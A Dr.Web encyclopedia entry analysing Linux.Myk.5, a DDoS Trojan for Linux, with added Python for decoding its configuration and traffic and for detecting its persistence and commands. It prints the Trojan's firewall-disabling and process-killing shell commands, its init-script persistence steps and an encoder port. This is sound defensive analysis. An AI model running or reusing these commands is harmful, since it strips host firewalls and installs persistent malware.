Linux.Myk.5

Added to the Dr.Web virus database: 2015-03-27

Virus description added:

A Trojan, attributed by Dr.Web to Chinese virus makers, that infects Linux computers and uses them to carry out DDoS attacks. Its ability to disable the host firewall makes it particularly dangerous. The Trojan's configuration file is obfuscated; the deobfuscation algorithm, reconstructed in Python, looks as follows:

from array import array

def decrypt(data):
    # Position-keyed byte substitution: the byte at index i is decremented when
    # i % 3 == 1 and incremented otherwise. Bytes <= 0x20 (controls and space)
    # and 0x7F (DEL) are dropped, but i still advances past them, so every
    # surviving byte is transformed according to its absolute offset.
    out = array('B')
    for i in range(len(data)):
        if (data[i] > 0x20) and (data[i] != 0x7F):
            if (i % 3 == 1):
                out.append((data[i] - 1) & 0xFF)
            else:
                out.append((data[i] + 1) & 0xFF)  # wrap 0xFF -> 0x00 like the native code
    return out
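As an added example (not part of Dr.Web's description), the following Python reproduces the deobfuscation with the same semantics and adds its inverse, so the two filter rules can be exercised on a constructed blob: bytes at or below 0x20 and the byte 0x7F are discarded but still advance the position counter, so the transform applied to each byte depends on its absolute offset, and a one-byte shift garbles everything after it. The sample content and the ':' separator are assumptions; the page does not give the configuration file's layout.

```python
def deobfuscate(data: bytes) -> bytes:
    """Same semantics as the decrypt() above, returning bytes and wrapping at 0xFF."""
    out = bytearray()
    for i, b in enumerate(data):
        if b > 0x20 and b != 0x7F:                 # controls, space and DEL are skipped...
            out.append((b - 1 if i % 3 == 1 else b + 1) & 0xFF)
    return bytes(out)                              # ...but i still counted them


def obfuscate(plain: bytes, noise: bytes = b"") -> bytes:
    """Inverse of deobfuscate(). `noise` is an optional prefix of bytes the decoder
    discards; each plaintext byte is encoded for its absolute offset in the output."""
    for n in noise:
        if n > 0x20 and n != 0x7F:
            raise ValueError("noise byte %#x would survive decoding" % n)
    out = bytearray(noise)
    for p in plain:
        i = len(out)                               # absolute offset, noise included
        b = (p + 1 if i % 3 == 1 else p - 1) & 0xFF
        if b <= 0x20 or b == 0x7F:                 # the decoder would drop this byte
            raise ValueError("plaintext byte %#x cannot sit at offset %d" % (p, i))
        out.append(b)
    return bytes(out)


def representable(plain: bytes, noise: bytes = b"") -> bool:
    """True if obfuscate() can encode `plain` so that deobfuscate() recovers it exactly."""
    try:
        return deobfuscate(obfuscate(plain, noise)) == plain
    except ValueError:
        return False


# Constructed sample: C&C address, port, installation name and path in a
# hypothetical ':'-separated layout (the real file format is not documented here).
SAMPLE_CONFIG = b"192.0.2.10:8080:mykd:/usr/bin/mykd"

if __name__ == "__main__":
    blob = obfuscate(SAMPLE_CONFIG, noise=b"\x00\x0a\x1f")
    print(blob)
    print(deobfuscate(blob))
```

Note that '!' cannot be encoded at offset 0 (it would become 0x20 and be dropped) but can at offset 1, and '~' cannot be encoded at any offset where i % 3 == 1; a real configuration therefore cannot contain arbitrary bytes, which is worth remembering when carving candidate config blobs from a sample.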

The configuration file contains the following data:

  1. Command and control server’s address
  2. Command and control server’s port
  3. Installation name
  4. Installation path

Once the configuration file has been decrypted, the Trojan checks whether a process of its own is already running on the system; if one is found, the Trojan terminates. During installation, the malware creates the file “/etc/init.d/%proc_name%”, where the installation name is taken from the configuration file, and writes the following contents to it:

#!/bin/bash
# chkconfig: 2345 77 37
# description: Open%proc_name% server daemon
setsid %install_path% &
exit

%proc_name% and %install_path% stand here for the parameters specified in the configuration file.

Next, the Trojan copies itself to the location specified in the configuration file and runs the installed copy. Then it deletes the original file.

Finally, the Trojan registers the script as a service for runlevels 2 through 5 and starts it:

ln -s /etc/init.d/%proc_name% /etc/rc2.d/S77%proc_name%
ln -s /etc/init.d/%proc_name% /etc/rc3.d/S77%proc_name%
ln -s /etc/init.d/%proc_name% /etc/rc4.d/S77%proc_name%
ln -s /etc/init.d/%proc_name% /etc/rc5.d/S77%proc_name%
service %proc_name% start
/etc/init.d/%proc_name%
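The installation steps above leave a recognisable footprint: an init script with the fixed "chkconfig: 2345 77 37" header and a "setsid <path> &" line, plus S77 symlinks in rc2.d through rc5.d. The following Python hunts for that footprint; it is an added example, not Dr.Web's tooling, and the names mykd and /usr/bin/mykd in the constructed sample tree are placeholders for %proc_name% and %install_path%.

```python
import os
import re
import tempfile

# Markers from the init script template the Trojan writes: the chkconfig header
# with runlevels 2345 and priorities 77/37, and the "setsid <path> &" start line.
CHKCONFIG_RE = re.compile(rb"^#\s*chkconfig:\s*2345\s+77\s+37\s*$", re.M)
SETSID_RE = re.compile(rb"^setsid\s+(\S+)\s*&\s*$", re.M)


def find_myk_persistence(root="/"):
    """Scan <root>/etc/init.d for scripts matching the template and report, per hit,
    the script, the binary it starts and the S77 rc symlinks that point at it."""
    hits = []
    initd = os.path.join(root, "etc", "init.d")
    if not os.path.isdir(initd):
        return hits
    for name in sorted(os.listdir(initd)):
        script = os.path.join(initd, name)
        if not os.path.isfile(script):
            continue
        try:
            with open(script, "rb") as fh:
                body = fh.read(4096)           # the template is only five lines
        except OSError:
            continue
        started = SETSID_RE.search(body)
        if not (CHKCONFIG_RE.search(body) and started):
            continue
        links = []
        for level in "2345":
            link = os.path.join(root, "etc", "rc%s.d" % level, "S77" + name)
            if os.path.islink(link) and os.path.basename(os.readlink(link)) == name:
                links.append(link)
        hits.append({"script": script,
                     "starts": started.group(1).decode("ascii", "replace"),
                     "rc_links": links})
    return hits


def build_sample_tree(root, proc_name="mykd", install_path="/usr/bin/mykd"):
    """Constructed sample: recreate the layout described above under `root`,
    plus a benign service with a different header that must not be reported."""
    initd = os.path.join(root, "etc", "init.d")
    os.makedirs(initd)
    script = os.path.join(initd, proc_name)
    with open(script, "wb") as fh:
        fh.write(b"#!/bin/bash\n# chkconfig: 2345 77 37\n"
                 b"# description: Open%s server daemon\nsetsid %s &\nexit\n"
                 % (proc_name.encode(), install_path.encode()))
    for level in "2345":
        rcdir = os.path.join(root, "etc", "rc%s.d" % level)
        os.makedirs(rcdir)
        os.symlink(script, os.path.join(rcdir, "S77" + proc_name))
    with open(os.path.join(initd, "sshd"), "wb") as fh:
        fh.write(b"#!/bin/sh\n# chkconfig: 2345 55 25\n# description: OpenSSH\nexec /usr/sbin/sshd\n")
    return script


def demo_scan():
    """Build the sample tree in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp, "mykd", "/usr/bin/mykd")
        return find_myk_persistence(tmp)


if __name__ == "__main__":
    for hit in demo_scan():
        print(hit)
```

On a live host run find_myk_persistence() against "/" (or against a mounted forensic image's root) and treat the "starts" path as the sample to collect; a hit with fewer than four rc links still matters, since the watchdog described below will recreate what an incomplete cleanup leaves behind.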

Once running on the infected computer, the Trojan starts a separate watchdog process that checks whether its copy from the installation directory is running. If that process cannot be found, the Trojan starts it again.

Once every 1,000 seconds, the malware executes the following commands to disable the firewall and kill the processes of other DDoS Trojans:

system("chkconfig --level 0123456 iptables off > /dev/null");
system("chkconfig --level 0123456 ip6tables off > /dev/null");
system("systemctl stop iptables.service > /dev/null");
system("service iptables stop > /dev/null");
system("/etc/init.d/iptables stop > /dev/null");
system("reSuSEfirewall2 stop > /dev/null");
system("SuSEfirewall2 stop > /dev/null");
system("service ebtables stop > /dev/null");
system("/etc/init.d/ebtables stop > /dev/null");
system("ufw disable > /dev/null");
system("netstat -anp | grep \":6009\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":60003\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":8092\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":8991\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10991\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10992\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10993\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":3040\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":37368\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":10771\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":34921\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":7600\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":199099\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":19009\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":1818\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("netstat -anp | grep \":57707\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
sleep(10);
system("rm -f /boot/IptabLes ; rm -f /boot/.IptabLes ; rm -f /boot/IptabLex ; rm -f /boot/.IptabLex ; rm -f /usr/IptabLes ; rm -f /usr/.IptabLes ; rm -f /usr/IptabLex ; rm -f /usr/.IptabLex");
system("netstat -anp | grep \"IptabLes\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
system("netstat -anp | grep \"IptabLex\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null");
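The routine above runs as plain shell commands, so it shows up wherever command execution is recorded (auditd execve records, shell history, an EDR's process tree). The following Python is an added example, not part of Dr.Web's description, that turns the routine into one rule per behaviour and triages a host's command lines; the sample lines are constructed to mirror the system() strings above, mixed with benign commands. The point of aggregating is that any one line (an admin disabling ufw, say) is unremarkable, while several distinct behaviours from the same host within a short window are not.

```python
import re

# One rule per behaviour in the 1,000-second routine above. Only the
# port-kill rule captures a group (the targeted port).
RULES = [
    ("chkconfig_iptables_off", re.compile(r"chkconfig\s+--level\s+\d+\s+ip6?tables\s+off")),
    ("iptables_stop", re.compile(r"(?:systemctl\s+stop\s+iptables|service\s+iptables\s+stop|/etc/init\.d/iptables\s+stop)")),
    ("susefirewall2_stop", re.compile(r"SuSEfirewall2\s+stop")),
    ("ebtables_stop", re.compile(r"(?:service\s+ebtables\s+stop|/etc/init\.d/ebtables\s+stop)")),
    ("ufw_disable", re.compile(r"\bufw\s+disable\b")),
    ("kill_by_port", re.compile(r'netstat\s+-anp.*grep\s+"?:(\d+)"?.*xargs\s+kill\s+-9')),
    ("iptables_family_rm", re.compile(r"rm\s+-f\s+/(?:boot|usr)/\.?IptabLe[sx]\b")),
    ("iptables_family_kill", re.compile(r'netstat\s+-anp.*grep\s+"?IptabLe[sx]"?.*xargs\s+kill\s+-9')),
]


def classify(cmdline: str):
    """Return (label, captured_port_or_None) for every rule the command line matches."""
    hits = []
    for label, rx in RULES:
        m = rx.search(cmdline)
        if m:
            hits.append((label, m.group(1) if m.groups() else None))
    return hits


def triage(cmdlines, min_distinct: int = 3) -> dict:
    """Aggregate over one host's executed commands. Several distinct behaviours
    is the signal; a single matching line can be an administrator's own work."""
    labels, ports = {}, []
    for line in cmdlines:
        for label, port in classify(line):
            labels[label] = labels.get(label, 0) + 1
            if port is not None:
                ports.append(int(port))
    return {"labels": labels, "killed_ports": ports,
            "suspicious": len(labels) >= min_distinct}


# Constructed sample, shaped like the system() strings above plus benign noise.
SAMPLE_CMDLINES = [
    "chkconfig --level 0123456 iptables off > /dev/null",
    "systemctl stop iptables.service > /dev/null",
    "ufw disable > /dev/null",
    "netstat -anp | grep \":6009\" |awk '{print $NF}' |cut -d \"/\" -f 1 | xargs kill -9 > /dev/null ;free -m > /dev/null",
    "rm -f /boot/IptabLes ; rm -f /boot/.IptabLes ; rm -f /boot/IptabLex ; rm -f /boot/.IptabLex",
    "ls -la /var/log",
    "service iptables restart",
]

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINES))
```

The list of killed ports doubles as a pivot: a process that was listening on one of them and died with SIGKILL at the same time is worth a look, since the Trojan only kills what it believes to be a competitor.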

Next, the Trojan starts two processes. One sends CPU load information to the criminals; the other waits for incoming commands from the server. The first packet the Trojan sends contains data about the infected computer, laid out as follows:

// Decompiler listing: _BYTE is an 8-bit and _DWORD a 32-bit unsigned integer.
// With pack(1) the record is 64 + 128 + 32 + 32 + 32 + 4 + 4 = 296 bytes.
#pragma pack(push,1)
struct st_online
{
  char gap[64];        // 0x00
  _BYTE cpuinfo[128];
  char meminfo[32];
  char osver[32];
  char version[32];    // "LZ32"
  _DWORD dword120;     // 0x00
  _DWORD bIsStopDDOS;
};
#pragma pack(pop)

Data received from the command and control server is sent in the clear; packets the Trojan sends to the server are encoded with the following routine (decompiled listing):

int __cdecl EnBuffer(_BYTE *data, int size, unsigned __int8 key)
{
  int result; // eax@3
  char v4; // [sp+13h] [bp-9h]@1
  int i; // [sp+14h] [bp-8h]@1
  v4 = key % 254 + 1;   // effective key is always in 1..254, never 0
  for ( i = 0; ; ++i )
  {
    result = i;
    if ( i >= size )
      break;
    data[i] ^= v4;      // XOR with the key...
    data[i] += v4;      // ...then add it, modulo 256, in place
  }
  return result;        // number of bytes processed
}
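To decode captured bot-to-server traffic you need both the st_online layout and the inverse of EnBuffer (subtract the key, then XOR). The following Python is an added example, not Dr.Web's code: it packs a constructed check-in record, encodes it exactly as EnBuffer does, and decodes it back. Little-endian integers and the sample key 0x5A are assumptions; the page does not say how the key is chosen or conveyed, so on a real capture the one-byte effective key would have to be recovered (there are only 254 candidates, and the "LZ32" version string is a convenient crib).

```python
import struct

# st_online as listed above under #pragma pack(1): 64+128+32+32+32+4+4 = 296 bytes.
# Little-endian integers are an assumption (the listing is from a 32-bit x86 build).
ST_ONLINE = struct.Struct("<64s128s32s32s32sII")


def en_buffer(data: bytes, key: int) -> bytes:
    """Port of EnBuffer(): k = key % 254 + 1, then per byte ((b ^ k) + k) mod 256."""
    k = (key & 0xFF) % 254 + 1            # key is an unsigned 8-bit value in the listing
    return bytes(((b ^ k) + k) & 0xFF for b in data)


def de_buffer(data: bytes, key: int) -> bytes:
    """Inverse of en_buffer(): ((b - k) mod 256) ^ k."""
    k = (key & 0xFF) % 254 + 1
    return bytes(((b - k) & 0xFF) ^ k for b in data)


def build_online(cpuinfo: bytes, meminfo: bytes, osver: bytes,
                 version: bytes = b"LZ32", stop_ddos: int = 0) -> bytes:
    """Pack a check-in record; struct NUL-pads short strings and truncates long ones."""
    return ST_ONLINE.pack(b"\0" * 64, cpuinfo, meminfo, osver, version, 0, stop_ddos)


def parse_online(blob: bytes) -> dict:
    """Unpack a decoded check-in record into its fields, trimming NUL padding."""
    _gap, cpu, mem, osv, ver, dword120, stop = ST_ONLINE.unpack(blob)
    cstr = lambda f: f.split(b"\0", 1)[0].decode("ascii", "replace")
    return {"cpuinfo": cstr(cpu), "meminfo": cstr(mem), "osver": cstr(osv),
            "version": cstr(ver), "dword120": dword120, "bIsStopDDOS": stop}


# Constructed sample check-in; host details and key are illustrative, not from a real capture.
SAMPLE_KEY = 0x5A
SAMPLE_PACKET = en_buffer(
    build_online(b"Intel(R) Xeon(R) CPU", b"1024 MB", b"Linux 2.6.32"), SAMPLE_KEY)

if __name__ == "__main__":
    print(parse_online(de_buffer(SAMPLE_PACKET, SAMPLE_KEY)))
```

Because the effective key is a single byte applied identically to every position, a 296-byte packet whose decoded bytes 256..259 read "LZ32" under one of the 254 candidates is almost certainly a Linux.Myk.5 check-in, which is a cheap way to pick them out of a capture without knowing the key in advance.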

The malware can execute the following commands:

  • Start the DDoS attack (SYN Flood)
  • Start the DDoS attack (UDP Flood)
  • Start the DDoS attack (DNS Flood)
  • Start the DDoS attack (HTTP Flood)
  • Start the DDoS attack (TCP Flood)
  • Terminate the DDoS attack
  • Download and run the file
  • Remove itself from the system
  • Initiate the Trojan’s update
  • Run Remote Shell
  • Save the command's data to the file “/.v8cf”, or send that file's contents to the server.

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Dr.Web © Doctor Web
2003 — 2022
